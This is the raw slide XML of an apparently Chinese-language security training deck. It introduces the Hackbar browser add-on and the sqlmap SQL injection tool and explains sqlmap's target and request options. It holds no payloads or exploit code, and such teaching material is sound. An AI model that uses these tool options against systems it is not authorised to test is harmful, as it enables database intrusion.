                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8BEE00B-6A40-7F48-842E-80FC828A4CFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect b="10226"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1935480" y="1582710"/>
            <a:ext cx="8336280" cy="5246708"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="109791328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Hackbar</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Firefox</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>插件）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3EE1B9A1-D9DE-1444-9422-A7E569305EB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect r="20875"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="731520" y="2352980"/>
            <a:ext cx="10618108" cy="4383100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96BD5EB3-45DB-8C46-A4B4-B8C14046E372}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="692150" y="1783179"/>
            <a:ext cx="9235440" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400"/>
              <a:t>请求包发送接收，编码解码，加密解密</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="350236397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Sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Sql</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>注入利用工具）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{985069F9-8B4C-1545-9D09-C512CD01F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533" y="1582710"/>
            <a:ext cx="8765773" cy="5275290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16929678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Sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（选项）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABF858B5-0EB5-7A45-9001-F7294CC5AF8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="924313" y="1838066"/>
            <a:ext cx="10571973" cy="4240584"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Target(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>目标</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>以下至少需要设置其中一个选项，设置目标 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>-d </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>DIRECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>直接连接到数据库。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">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u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>URL, --url=URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>目标 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>-l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>LIST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>从 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Burp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>或 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>WebScarab </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>代理的日志中解析目标。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">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r </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>REQUESTFILE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>从⼀个⽂件中载入 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>请求。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">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g </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>GOOGLEDORK </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>处理 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Google dork </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>的结果作为目标 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>。 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
              <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>-c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>CONFIGFILE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>从 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>INI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>配置文件中加载选项。 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2600">
              <a:effectLst/>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80832758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Sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（选项）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABF858B5-0EB5-7A45-9001-F7294CC5AF8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="924313" y="1838066"/>
            <a:ext cx="10571973" cy="3640420"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Request(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>请求</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>这些选项可以用来指定如何连接到⽬标 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>。 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
              <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>--data=DATA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>通过 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>POST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>发送的数据字符串</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
              <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="15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cookie=COOKIE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>HTTP Cookie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>头 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
              <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="15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cookie-urlencode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>编码生成的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>cookie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>注⼊ </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
              <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="15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drop-set-cookie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>忽略响应的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Set-Cookie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
